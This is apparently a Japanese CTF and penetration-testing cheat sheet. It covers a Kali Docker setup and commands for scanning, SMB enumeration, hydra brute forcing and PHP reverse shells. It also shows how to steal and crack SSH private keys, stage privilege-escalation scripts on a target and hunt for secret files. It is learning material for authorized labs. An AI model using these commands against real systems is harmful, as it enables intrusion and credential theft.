//////////////////////////////
// Settings
//////////////////////////////
:toc: macro
:toc-title: 目次
:toclevels: 5
:sectnums:
:sectanchors:
:sectlinks:
:idprefix:
:idseparator: -
ifndef::env-github[:icons: font]
ifdef::env-github[]
:status:
:outfilesuffix: .adoc
:caution-caption: :fire:
:important-caption: :exclamation:
:note-caption: :paperclip:
:tip-caption: :bulb:
:warning-caption: :warning:
endif::[]

//////////////////////////////
// Contents
//////////////////////////////
= CTF

[CAUTION]
====
KtokKawuは、自衛や検証/CTFのため、ハッキング技術を学習しています。 +
自分の管理外の端末や機器(一般に公開されているWebサイトや各種サーバやWi-Fiスポット、他人の端末や機器等)に対し、 +
非合法な目的で本リポジトリで公開しているツール類やテクニックを使用しないこと。 +
必ず自己責任の元、ローカル環境やCTF等で攻撃が許可されたサイトに対してのみ使用すること。 +
KtokKawuは、本リポジトリを利用する他のユーザや企業、団体等が起こした全ての事象に関して一切責任を負いません。
====

toc::[]

== Kali Dockerコンテナの作成

=== 初回の手順

[PowerShell/CMD]
----
# Kali Linuxの公式イメージDL
docker pull kalilinux/kali-rolling
docker images
# Dockerfileを使用する場合
docker image build -t kalilinux/kali-rolling:latest C:\path\to\Dockerfile
# コンテナ(初回)起動
docker run -it --name <C-NAME> kalilinux/kali-rolling
docker exec -it <CID> /bin/bash
# リポジトリの登録
echo "deb http://http.kali.org/kali kali-rolling main contrib non-free" > /etc/apt/sources.list \
&& echo "deb-src http://http.kali.org/kali kali-rolling main contrib non-free" >> /etc/apt/sources.list \
&& echo "deb http://http.kali.org/kali kali-last-snapshot main contrib non-free" >> /etc/apt/sources.list \
&& echo "deb http://http.kali.org/kali kali-experimental main contrib non-free" >> /etc/apt/sources.list
# Kali Linuxのパッケージインストール
apt -y update && apt -y upgrade
apt install -y kali-linux-full
# 他ツール、ライブラリ
apt install -y bash-completion build-essential bzip2 colordiff colortail curl exiftool gdb git iputils-ping iputils-tracepath jq libjpeg-dev libssl-dev libxml2-dev libxslt1-dev ltrace mariadb-client net-tools nodejs npm openvpn postgresql python-dev rlwrap smbclient steghide strace telnet tor vim wget yarnpkg zip zlib1g-dev
curl https://raw.githubusercontent.com/Paradoxis/StegCracker/master/stegcracker > /usr/local/bin/stegcracker
chmod +x /usr/local/bin/stegcracker
# apt install -y bash-completion build-essential bzip2 colordiff colortail libjpeg-dev libssl-dev nikto nmblookup pip python-pybloomfiltermmap rpcclient
# Setup gdb-peda
git clone https://github.com/longld/peda.git ~/peda \
&& echo "source ~/peda/peda.py" >> ~/.gdbinit
# Setup nmap CVE script
# Option Usage: --script=vulscan/vulscan.nse www.example.com
git clone https://github.com/scipag/vulscan ~/scipag_vulscan \
&& ln -s `pwd`/scipag_vulscan /usr/share/nmap/scripts/vulscan
# Install and configure AutoRecon
/tools \
&& git clone --depth 1 https://github.com/Tib3rius/AutoRecon.git /tools/AutoRecon \
&& cd /tools/AutoRecon \
&& pip3 install -r requirements.txt \
&& ln -s /tools/AutoRecon/src/autorecon/autorecon.py /usr/local/bin/autorecon
# Get some scripts
git clone https://github.com/pentestmonkey/php-reverse-shell ~/prh \
&& git clone https://github.com/lucyoa/kernel-exploits ~/exploits/ksploits \
&& git clone https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite ~/exploits/peass \
&& git clone https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack ~/exploits/unixploits \
&& git clone https://github.com/danielmiessler/SecLists /usr/share/seclists \
&& git clone https://github.com/andresriancho/w3af.git /opt/w3af \
/opt/w3af/w3af_console ; \
bash /tmp/w3af_dependency_install.sh ; \
echo 'export PATH=/opt/w3af:$PATH' >> /etc/profile
# Get Password list
mkdir ~/pwd-list \
&& wget -P ~/pwd-list/ http://downloads.skullsecurity.org/passwords/john.txt.bz2 \
&& wget -P ~/pwd-list/ http://downloads.skullsecurity.org/passwords/cain.txt.bz2 \
&& wget -P ~/pwd-list/ http://downloads.skullsecurity.org/passwords/conficker.txt.bz2 \
&& wget -P ~/pwd-list/ http://downloads.skullsecurity.org/passwords/500-worst-passwords.txt.bz2 \
&& wget -P ~/pwd-list/ http://downloads.skullsecurity.org/passwords/twitter-banned.txt.bz2 \
# Kaliイメージの「/usr/share/wordlists/rockyou.txt」の方が新しい
# && wget -P ~/pwd-list/ http://downloads.skullsecurity.org/passwords/rockyou.txt.bz2 \
&& wget -P ~/pwd-list/ http://downloads.skullsecurity.org/passwords/phpbb.txt.bz2 \
&& wget -P ~/pwd-list/ http://downloads.skullsecurity.org/passwords/myspace.txt.bz2 \
&& wget -P ~/pwd-list/ http://downloads.skullsecurity.org/passwords/hotmail.txt.bz2 \
&& wget -P ~/pwd-list/ http://downloads.skullsecurity.org/passwords/faithwriters.txt.bz2 \
&& wget -P ~/pwd-list/ http://downloads.skullsecurity.org/passwords/elitehacker.txt.bz2 \
&& wget -P ~/pwd-list/ http://downloads.skullsecurity.org/passwords/hak5.txt.bz2 \
&& wget -P ~/pwd-list/ http://downloads.skullsecurity.org/passwords/alypaa.txt.bz2 \
&& wget -P ~/pwd-list/ http://downloads.skullsecurity.org/passwords/facebook-pastebay.txt.bz2 \
&& wget -P ~/pwd-list/ http://downloads.skullsecurity.org/passwords/porn-unknown.txt.bz2 \
&& wget -P ~/pwd-list/ http://downloads.skullsecurity.org/passwords/tuscl.txt.bz2 \
&& wget -P ~/pwd-list/ http://downloads.skullsecurity.org/passwords/facebook-phished.txt.bz2 \
&& wget -P ~/pwd-list/ http://downloads.skullsecurity.org/passwords/carders.cc.txt.bz2 \
&& wget -P ~/pwd-list/ http://downloads.skullsecurity.org/passwords/singles.org.txt.bz2 \
&& wget -P ~/pwd-list/ http://downloads.skullsecurity.org/passwords/english.txt.bz2 \
&& wget -P ~/pwd-list/ http://downloads.skullsecurity.org/passwords/german.txt.bz2 \
&& wget -P ~/pwd-list/ http://downloads.skullsecurity.org/passwords/us_cities.txt.bz2 \
&& wget -P ~/pwd-list/ http://downloads.skullsecurity.org/passwords/porno.txt.bz2 \
&& wget -P ~/pwd-list/ http://downloads.skullsecurity.org/passwords/honeynet.txt.bz2 \
&& wget -P ~/pwd-list/ http://downloads.skullsecurity.org/passwords/file-locations.txt.bz2 \
&& wget -P ~/pwd-list/ http://downloads.skullsecurity.org/passwords/fuzzing-strings.txt.bz2 \
&& wget -P ~/pwd-list/ http://downloads.skullsecurity.org/passwords/phpmyadmin-locations.txt.bz2 \
&& wget -P ~/pwd-list/ http://downloads.skullsecurity.org/passwords/web-extensions.txt.bz2 \
&& wget -P ~/pwd-list/ http://downloads.skullsecurity.org/passwords/web-mutations.txt.bz2 \
&& bzip2 -d ~/pwd-list/*.bz2
# コンテナ保存
docker stop <CID>
docker rename <CID> <C-NAME>
docker commit <CID> <REPO-NAME>:<TAG-NAME>
# コンテナ起動(ホスト側へポートフォワード)
# openvpnを利用するには、Linux capabilitiesのCAP_NET_ADMINを許可する必要があるため、「--cap-add NET_ADMIN」を追加
# 上記により、openvpn利用時の「ERROR: Cannot ioctl TUNSETIFF tun: Operation not permitted (errno=1)」を回避
# またmountを利用するには、Linux capabilitiesのCAP_SYS_ADMINを許可する必要があるため、「--cap-add SYS_ADMIN」を追加
docker images
docker run --cap-add NET_ADMIN  --cap-add SYS_ADMIN --name <C-NAME> -itd -p <HOST-PORT>:<C-PORT> <REPO-NAME>:<TAG-NAME>
docker ps -a
# 不要なコンテナ、イメージ削除
docker rm -f <CID>
docker rmi -f <IID>
----

=== 2回目以降のコンテナ利用

[PowerShell/CMD]
----
# コンテナ接続
docker exec -it <C-NAME> /bin/bash
# コンテナ開始/停止/再起動
docker stop/start/restart <C-NAME>
# コンテナ内からホストへファイルをコピー
docker cp <C-ID>:/file/path/within/container /host/path/target
# IP確認
docker inspect --format '{{ .NetworkSettings.IPAddress }}' <C-NAME>

# /bin/bash
# openvpn利用時の「ERROR: Cannot open TUN/TAP dev /dev/net/tun: No such file or directory (errno=2)」の回避
mkdir -p /dev/net
mknod /dev/net/tun c 10 200
# Try Hack MeへのOpen VPN接続
openvpn /etc/openvpn/[TryHackMeUserName].ovpn &
----
  
=== 注意事項

* Windows Firewallの受信規則のうち、パブリックの「com.docker.backend」が有効だと、 +
リバースシェルを張る時などのインバウンド通信が失敗してしまう。Linuxで構築する場合も同様。
* 「--cap-add」を利用する代わりに「--privileged」でもopenvpnのエラー(errno=1)を回避できるが、 +
プライベートDockerインスタンスが特権モードで実行されると、ホストプロセスのアクセスやエスカレーションを許してしまうため非推奨。
* dockerコンテナ側でopenvpnを張るとホストOS側のopenvpnが阻害されるため対策を考え中。。。★

== ハッキング技術メモ

=== ポートとOSSバージョンの確認

----
nmap -T5 --max-retries 2500 -sC -sV [TargetIP]
----

=== CVEのチェック

* nmap
+
----
git clone https://github.com/scipag/vulscan scipag_vulscan
ln -s `pwd`/scipag_vulscan /usr/share/nmap/scripts/vulscan
nmap -sV -p [TargetPort] --script=vulscan/vulscan.nse www.example.com [TargetIP]
----
+
* searchsploit
+
----
searchsploit [word]     # wordExapmle: 「ProFTPd 1.3.5」、「Apache 2.4.18」
----

=== ディレクトリ調査

オプションを増やすほど重くなることに注意。

----
gobuster dir \                    # ディレクトリ/ファイルの総当たりモード
         -u http://[TargetIP]/ \
#         -e \                     # URL全体を表示
#         -k \                     # SSL証明書の検証をスキップ、CTF系ではHTTPSは少なそう
#         -o ./result_gobuster.txt
#         -s 200 \                 # 301,302,403,404
         -t 64 \                  # 同時スレッド数、デフォルトは40らしい
         -w [DirList] \
         -x html,txt \            # php
----

DirList

* /usr/share/wordlists/dirb/common.txt
* /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

=== ファイル調査

* Linux
+
----
find / -name "FileName" -type f
grep "FileContents" -rl /
find / -find / -type f -print | xargs grep 'FileContents'
# 「anonymous」ユーザや判明したユーザでログイン
ftp [TargetIP]
# ls -laやpwd、cdで調査
# get FILENAME
----
+
* Windows
+
----
rem 管理者のみdiskpartを使用可能
echo list volume | diskpart
dir /s /b | find "FileNameOrFileFormat"
findstr /s /i FileContents c:\*
----

=== Enumeration

==== enum4linux

----
enum4linux -a [Target
] | tee ./enum4linux.log
----

==== link:https://github.com/rebootuser/LinEnum[LinEnum]

----
# 攻撃者側
cd /var/tmp
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
python3 -m http.server [MyHostPort]

# ターゲット側
cd /var/tmp
which wget
wget [MyHostIP]:[MyHostPort]/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh
----

=== Crypto

==== Base64

----
echo -n "username:password" | base64
echo "dXNlcm5hbWU6cGFzc3dvcmQ=" | base64 -d
----

==== asciicode

----
python3
>>> c=[72,101,108,108,111,44,32,87,111,114,108,100,33]
>>> ''.join([chr(i) for i in c])
'Hello, World!'
----

==== ROT

単換字式暗号（シーザー暗号）の処理

----
alias rot13="tr 'A-Za-z' 'N-ZA-Mn-za-m'"
alias rot47="tr '\!-~' 'P-~\!-O'"
----

----
$ echo "Uryyb Jbeyq!" | rot13
Hello World!
----

=== Forensics

==== Steganography

* Image
** Exif(Exchangeable image file)情報(JPEG、TIFF、JPEG XR)の確認
+
----
exiftool target.jpg
----
+
** ファイル情報の確認
+
----
# file type/category info
binwalk -e target.jpg
# target/embedded file data info
steghide info target.jpg
----
+
** ファイルのヘッダやフッタ、内部データ構造に基づくファイル復元
+
----
foremost target.jpg
----
+
** 埋込み情報(ファイル)の抽出
+
----
binwalk -D='.*' target.dat
steghide extract -sf target.jpg -p [password]
----
+
** 総当り攻撃による埋込み情報の取得
+
----
stegcracker target.jpeg /usr/share/wordlists/rockyou.txt
----
+
* zip
** メタ情報の確認
+
----
zipinfo -v file.zip
----
+
** 暗号化zipに対する既知平文攻撃 +
LinuxやMacのzipコマンド、他アーカイバの間で圧縮率に差異があるため、各zipの圧縮率はいずれかの方法で揃える。
+
----
pkcrack -C test.zip \       # 暗号化されたzipファイル
        -c plaintext.txt \  # 暗号化されたzipファイルの中で、平文が分かるファイル
        -p plaintext.txt \  # 平文ファイル
        -P plaintext.zip \  # 平文のファイルが入っている暗号化されていないzip
        -d target.zip       # 出力先（復号したzipファイルの名前）
----

==== 任意のファイル内容の抽出

----
$ grep \-o "thm{.*}" f.01
thm{example_flag}
----

==== ファイルヘッダの修正

一例として、「xxd」コマンドで16進数にダンプし、「dd」コマンドでファイル内容を修正する。

|===
|bs=byte数 |1回に読み書きするブロックサイズ(byte)を指定。 +
ブロックサイズには、例として1024の累乗ならK、1000の累乗ならKBが使える。
|conv=変換方法 |notrunc等の規定の変換方法で変換する。 +
変換方法の指定は「,」で区切り、複数指定可能。
|notrunc |ddコマンドの規定の変換方法の1つ。出力ファイルを切り詰めない。
|===

----
$ xxd file.png | head
00000000: 0000 0000 0d0a 1a0a 0000 000d 4948 4452  ............IHDR
00000010: 0000 02d0 0000 015e 0800 0000 0089 6e77  .......^......nw
$ printf '\x89\x50\x4e\x47' | dd conv=notrunc of=file.png bs=1
4+0 records in
4+0 records out
4 bytes copied, 0.000119739 s, 33.4 kB/s
$ xxd file.png | head
00000000: 8950 4e47 0d0a 1a0a 0000 000d 4948 4452  .PNG........IHDR
00000010: 0000 02d0 0000 015e 0800 0000 0089 6e77  .......^......nw
----

=== SMB Attack

==== Tools

[cols="1,5"]
|===
|ツール名 |説明

|nmblookup
|NetBIOS名の検索に使用されるNetBIOS over TCP/IPクライアントを収集

|smbclient
|SMB共有ディレクトリにアクセスするftpのようなクライアント

|nmap
|ポートスキャナ with スクリプト

|rpcclient
|クライアント側のMS-RPC機能を実行するツール

|enum4linux
|さまざまなsmb関数を列挙

|wireshark
|「ntlmssp.ntlmv2_response」でフィルタリングしてNTLMv2のトラフィックからsmbの情報を取得可能
|===

==== チェックリスト

* ホスト名の確認
+
----
# -A オプション：look up by IP address
nmblookup -A [ip]
----
+
* 共有フォルダの一覧
+
----
# nmapによる共有フォルダ一覧の表示(-pオプションがあるとscriptが動かない場合有り)
nmap -T5 --script nfs-ls,nfs-statfs,nfs-showmount -p 445 [TargetIP]
# ホスト上の共有フォルダ一覧とアクセス権を表示
smbmap -H [ip/hostname] -R
# SMBからファイルを取得
smbmap -H [ip/hostname] -R --download '.\Anonymous\staff.txt'
# 資格情報を取得後に再実行し、新しいアクセス権を表示
smbmap -H [ip] -d [domain] -u [user] -p [password]
# nullログインをチェックするため、"exit"は現れる可能性のある全PW要求を処理する
# -L オプション：指定されたホストの共有のリストを取得します
echo exit | smbclient -L \\\\[ip]
# --script smb-enum-shares：特定のsmb列挙スクリプト
# -p 139,445：smbポートの指定
nmap --script smb-enum-shares -p 139,445 [ip]
----
+
* NULLセッションでの確認
+
----
# 資格情報無しで何ができるか確認
smbmap -H [ip/hostname]
# 本コマンドの後、RPCコマンドを入力してみる
# -U ""：NULLセッション
# -N オプション：PWD無し
rpcclient -U "" -N [ip]
# 共有フォルダへの接続試行、空PWDでも行ける可能性有り。
smbclient \\\\[ip]\\[share name]
----
+
* 脆弱性の確認
+
----
# --script smb-vuln*：全smb脆弱性スキャンスクリプトを実行
nmap --script smb-vuln* -p 139,445 [ip]
----
+
* SMB全体のスキャン
+
----
enum4linux -a [ip]
----
+
上記内容の確認で注目する内容は下記。
+
. nmblookup同様の出力
. nullセッションのチェック
. 共有フォルダのリスト
. ドメイン情報
. パスワードポリシー
. RIDサイクリング出力
* 手操作確認 +
smbのバージョンを取得するスクリプト
+
.smbver.sh
----
#!/bin/sh
# Author: rewardone
# Description:
#   Requires root or enough permissions to use tcpdump
#   Will listen for the first 7 packets of a null login and grab the SMB Version
# Notes:
#   Will sometimes not capture or will print multiple lines.
#   May need to run a second time for success.
# Usage:
#   smbver.sh [IP] (port) [Samba]
if [ -z $1 ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit; else rhost=$1; fi
if [ ! -z $2 ]; then rport=$2; else rport=139; fi
tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'aUnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &
echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null
sleep 0.5 && echo ""
----
+
上記スクリプトの結果が疑わしい時は、PCAPファイルから、smbバージョンを確認
+
----
# 例：Unix Samba 2.2.3a
check pcap
----

=== Bruteforce Attack

.Bruteforce tool list
[cols="2, 7a"]
|===
|ツール名 |サポートプロトコル

|Hydra
|TELNET, FTP, HTTP, HTTPS, HTTP-PROXY, SMB, SMBNT, MS-SQL, MYSQL, REXEC, irc, RSH, +
RLOGIN, CVS, SNMP, SMTP, SOCKS5, VNC, POP3, IMAP, NNTP, PCNFS, XMPP, ICQ, +
SAP/R3, LDAP2, LDAP3, Postgres, Teamspeak, Cisco auth, Cisco enable, AFP, Subversion/SVN, +
Firebird, LDAP2, Cisco AAA, Web form

|Medusa
|AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NetWare NCP, NNTP, PcAnywhere, POP3, +
PostgreSQL, REXEC, RLOGIN, RSH, SMBNT, SMTP-AUTH, SMTP-VRFY, SNMP, SSHv2, Subversion (SVN), +
Telnet, VMware Authentication Daemon (vmauthd), VNC, Generic Wrapper, Web Form

|Ncrack
|RDP, SSH, http(s), SMB, pop3(s), VNC, FTP, telnet
|===

==== hydra

* 効率的には、およそssh(2/s) < ftp(6/s) < http-basic(100/s)の速さ
* パスワードスプレー攻撃も可能 +
-l：uid固定、-L：uidリスト、-p：pwd固定、-P：pwdリスト

----
hydra -l [uname] \
      -P ~/pwd-list/[pwdtext] \
      [TargetIP] \              # Protocol can be added
      [TargetProtocol] \        # Can be omitted
      -V \                      # Display UID, PWD during UID/PWD mining
      -f \                      # Stop hydra when the specified PWD is found
# Web form
#     http-post-form \          # TargetProtocol
# Example: "[Login Page]:[Request Body]:[Error Message]"
#     "/path/to/login:uid=^USER^&pwd=^PASS^&Login=Login:Login Failed"
----

==== ncrack

* RDPサービスに関してはhydraより早いらしい

----
ncrack -u [uname] \
       -P ~/pwd-list/[pwdtext] \
       -T5 [TargetIP] \
       -p [TargetServicePort]
----

==== meduza

* 一番遅い

----
medusa -h [TargetIP] \
       -u [uname] \
       -P ~/pwd-list/[pwdtext] \
       -M [TragetService]
# Web Form
#      -M web-form \
#      -m FORM:"path/to/login" \
#      -m DENY-SIGNAL:"Example Access Denied" \
#      -m FORM-DATA:"post?uid=&pwd=&Login=ExampleLogin"
----

=== Penetration

==== PHPリバースシェル

===== Scripts

https://github.com/pentestmonkey/php-reverse-shell

===== 手順

----
vim php-reverse-shell.php # change "$ip" value to [MyHostIP]
rlwrap nc -lvnp 1234
# Uploading PRS file & Web Access
----

==== Web App attack

===== Tools

* Proxy Tool
** link:https://portswigger.net/burp[Burp Suite]
** link:https://mitmproxy.org/[mitmproxy]
** link:https://owasp.org/www-project-zap/[OWASP ZAP]
** link:https://github.com/DeNA/PacketProxy[Packet Proxy]
** link:https://www.telerik.com/fiddler[Telerik Fiddler]
* link:https://owasp.org/www-community/Vulnerability_Scanning_Tools[Scan/Fuzzing Tools]

===== Payloads

link:https://github.com/swisskyrepo/PayloadsAllTheThings[PayloadsAllTheThings]

==== RSAプライベートキーのクラック

----
scp [TargetUser]@[TargetIP]:/home/[TargetUser2]/.ssh/id_rsa /root/
/usr/share/john/ssh2john.py ./id_rsa > crack
john --format=SSH --wordlist=/usr/share/wordlists/rockyou.txt crack
john crack --show
chmod 600 id_rsa
----

=== Privilleged Escaration

==== Scripts

* link:https://github.com/lucyoa/kernel-exploits[kernel-exploits by lucyoa]
* link:https://github.com/sleventyeleven/linuxprivchecker[Linuxprivchecker by slevenyeleven]
* link:https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite[PEASS by carlospolop]
* link:https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack[Unix-Privilege-Escalation-Exploits-Pack by Kabot]

==== Upload

----
# 攻撃者側
cd /var/tmp
wget [Script]
python3 -m http.server [MyHostPort]

# ターゲット側 
cd /var/tmp
wget http://[MyHostIP]:[MyHostPort]/[Script]
chmod +x [Script]
----

.権限の緩いディレクトリの例
----
/var/tmp
/dev/shm
/var/lock
/run/lock
----

==== link:https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite[PEASS]

===== linPEAS

----
# 攻撃者側
wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh

# ターゲット側(アップロード後)
./linpeas.sh
----

===== winPEAS

★coming soon

==== https://github.com/sleventyeleven/linuxprivchecker[Linuxprivchecker]

Python 2.6以降またはargparserがインストールされているシステムの場合、次のオプションを利用できるらしい。


----
# 攻撃者側
wget https://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.py

# ターゲット側(アップロード後)
python linuxprivchecker.py
----

==== 攻撃・防御のコツ

* id_rsaファイルや、RSAプライベートキーに当たる内容がないかfindコマンドで探す
* 「sudo -l」にて、特権で使えるコマンドを列挙し、当該コマンドのうち特権昇格できる方法をlink:https://gtfobins.github.io[GTFOBins]で探す
* ターゲット側でスクリプトを実行する際は、使っているユーザ権限で自由にファイル授受できるディレクトリに移動するとよい。 +
-> 攻撃者が足跡をなるべく残さないために何をしている...？ + 
　 tor、串、over ssh、ログ削除、rootで行動、と他には何があるか？ +
　 ->別サーバへログをリダイレクトしたほうがいい、権限認証もしっかりして侵入させない
+
.RHEL系
|===
|ディレクトリ/ファイル名|形式
|/var/run/utmp|バイナリ
|/var/log|テキスト/バイナリ
|===
+
.Debian系
|===
|ディレクトリ名|形式
|/var/log|テキスト/バイナリ
|===
+
※ logの設定は、/etc/rsyslog.confや/etc/rsyslog.d/*.confを確認
+
* 秘密情報の取得
+
----
find /  -iname "*pwd*" -or -iname "*pass*" -or -iname "*secret*" -or -name "id_rsa" 2>/dev/null
----

== 情報元

----
# Docker
https://hub.docker.com/u/kalilinux
https://www.kali.org/docs/containers/official-kalilinux-docker-images/
http://www.tohoho-web.com/docker/index.html
https://qiita.com/wMETAw/items/34ba5c980e2a38e548db
http://docs.docker.jp/index.html
# General
https://kakyouim.hatenablog.com/entry/2020/04/17/182049
https://www.aldeid.com/wiki/Main_Page
# Crypto
https://falconctf.hatenablog.com/
# SMB Attack
https://medium.com/@arnavtripathy98/smb-enumeration-for-penetration-testing-e782a328bf1b
https://0xdf.gitlab.io/2018/12/02/pwk-notes-smb-enumeration-checklist-update1.html
# Forensic tools
https://qiita.com/knqyf263/items/6ebf06e27be7c48aab2e
https://github.com/Va5c0/Steghide-Brute-Force-Tool
# Directory Search
https://redteamtutorials.com/2018/11/19/gobuster-cheatsheet/
# Bruteforce Attack
https://redteamtutorials.com/2018/10/25/hydra-brute-force-techniques/
https://ozuma.hatenablog.jp/entry/20130601/1370094859
# Penetration
https://github.com/pentestmonkey/php-reverse-shell
# Privilege escalation
https://github.com/lucyoa/kernel-exploits
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite
https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack
https://null-byte.wonderhowto.com/how-to/use-linenum-identify-potential-privilege-escalation-vectors-0197225/
https://kakyouim.hatenablog.com/entry/2020/03/14/031746
# Password lists
https://wiki.skullsecurity.org/Passwords
https://github.com/danielmiessler/SecLists/tree/master/Passwords
# Asscidoctor
https://github.com/asciidoctor/asciidoctor/blob/master/README-jp.adoc
https://asciidoctor.org/docs/user-manual/
https://asciidoctor.org/docs/asciidoc-recommended-practices/
# Linux Log
https://qiita.com/Yorinton/items/897c1ccd6797a7df7805
# Linux capabilities
https://man7.org/linux/man-pages/man7/capabilities.7.html
----
